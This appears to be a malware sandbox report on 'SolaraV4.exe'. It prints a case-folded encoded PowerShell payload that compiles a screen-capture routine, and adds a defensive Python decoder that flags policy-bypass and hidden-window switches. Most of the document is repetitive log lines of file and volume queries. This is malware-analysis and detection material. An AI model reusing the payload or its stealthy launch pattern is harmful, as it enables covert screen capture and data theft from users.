lahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
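The three `-encodedcommand` entries above carry the same blob: base64 of the UTF-16LE text of a PowerShell script. Read with the case-folding undone it opens with `$source = @"` followed by C# (`using System.Drawing;`, `using System.Windows.Forms;`, `public class Screenshot` with a `CaptureScreens()` method returning a `List<Bitmap>`) and, at the point where the report cuts the command line off, reaches `Add-Type -TypeDefinition $source -ReferencedAssemblies`: a screen-capture routine compiled at run time. Base64 is case-sensitive, so the blob as printed here (every letter lower-cased by the report) does not decode; the reading above is possible only because the zero high byte of each UTF-16LE character constrains which case each position can have. For tooling, take the original command line from the raw process data or from a source that preserves it (Sysmon event 1, or 4688 with command-line logging). The Python below is an added example, not part of the report or of the sample; it finds the encoded argument under the abbreviations `powershell.exe` accepts, decodes it, flags the launcher switches, and recognises a case-folded blob instead of emitting garbage. The script it encodes is a constructed stand-in of the same shape as the real one; `REPORT_BLOB_PREFIX` is the first 36 characters of the blob exactly as printed above.

```python
import base64
from typing import Optional

# Constructed stand-in for the report's script: a here-string handed to Add-Type.
SAMPLE_SCRIPT = '$src = @"\r\nusing System;\r\n"@\r\nAdd-Type -TypeDefinition $src\r\n'

# Opening of the blob exactly as the report prints it: all letters lower-case.
REPORT_BLOB_PREFIX = "jabzag8adqbyagmazqagad0aiabaaciadqak"


def encode_command(script: str) -> str:
    """What powershell.exe expects after -EncodedCommand: base64 of the UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def find_encoded_blob(cmdline: str) -> Optional[str]:
    """Argument of -EncodedCommand, accepting the unambiguous prefixes powershell.exe takes
    (-e, -ec, -enc, ... and '/' in place of '-'); None when the flag is absent."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        if tok[0] in "-/" and flag and "encodedcommand".startswith(flag):
            return tokens[i + 1].strip("\"'")
    return None


def decode_blob(blob: str) -> Optional[str]:
    """Script text of an -EncodedCommand argument, or None when the bytes are not UTF-16LE
    text, which is what a case-folded or otherwise mangled blob yields."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)   # padding often dropped
    except ValueError:
        try:   # cut short by a command-line length cap: decode the complete quartets only
            raw = base64.b64decode(blob[: len(blob) // 4 * 4], validate=True)
        except ValueError:
            return None
    high_bytes = raw[1::2]   # UTF-16LE: the high byte of every ASCII character is 0
    if not high_bytes or high_bytes.count(0) < 0.8 * len(high_bytes):
        return None
    return raw.decode("utf-16-le", errors="replace")


def triage_powershell(cmdline: str) -> dict:
    """Launcher switches that bypass policy or hide the session, the encoded blob, and the
    decoded script (or the reason it cannot be read)."""
    lowered = cmdline.lower()
    watched = ["-noprofile", "-executionpolicy bypass", "-windowstyle hidden",
               "-noninteractive", "-nologo"]
    switches = [s for s in watched if s in lowered]
    blob = find_encoded_blob(cmdline)
    script = decode_blob(blob) if blob else None
    note = ""
    if blob and script is None:
        note = "encoded payload is not UTF-16LE text as recorded"
        if blob == blob.lower():
            note += " (no upper-case characters: case-folded by the logging tool)"
    return {"switches": switches, "blob": blob, "script": script, "note": note}


SAMPLE_CMDLINE = ("powershell.exe -noprofile -executionpolicy bypass -encodedcommand "
                  + encode_command(SAMPLE_SCRIPT))

if __name__ == "__main__":
    folded = "powershell.exe -noprofile -executionpolicy bypass -encodedcommand " + REPORT_BLOB_PREFIX
    for cmd in (SAMPLE_CMDLINE, folded):
        result = triage_powershell(cmd)
        print(result["switches"], result["note"] or "decoded:")
        if result["script"]:
            print(result["script"])
```

The 80% threshold on zero high bytes leaves room for the odd non-ASCII character (a BOM or a string literal in a non-Latin script) while still rejecting the random bytes a case-folded or truncated-and-padded blob decodes to; `-encodedarguments`, which also takes base64, is deliberately not matched, since its argument is a serialised argument list rather than a script.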
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C722B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 108_2_00007FF7C722B340
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC79570 cpuid 1_2_00007FF6FFC79570
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\_ctypes.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\libssl-1_1.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\select.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\sqlite3.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\unicodedata.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\_sqlite3.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\_ssl.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\_lzma.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\_bz2.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\_sqlite3.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\_socket.pyd VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\select.pyd VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\_ssl.pyd VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
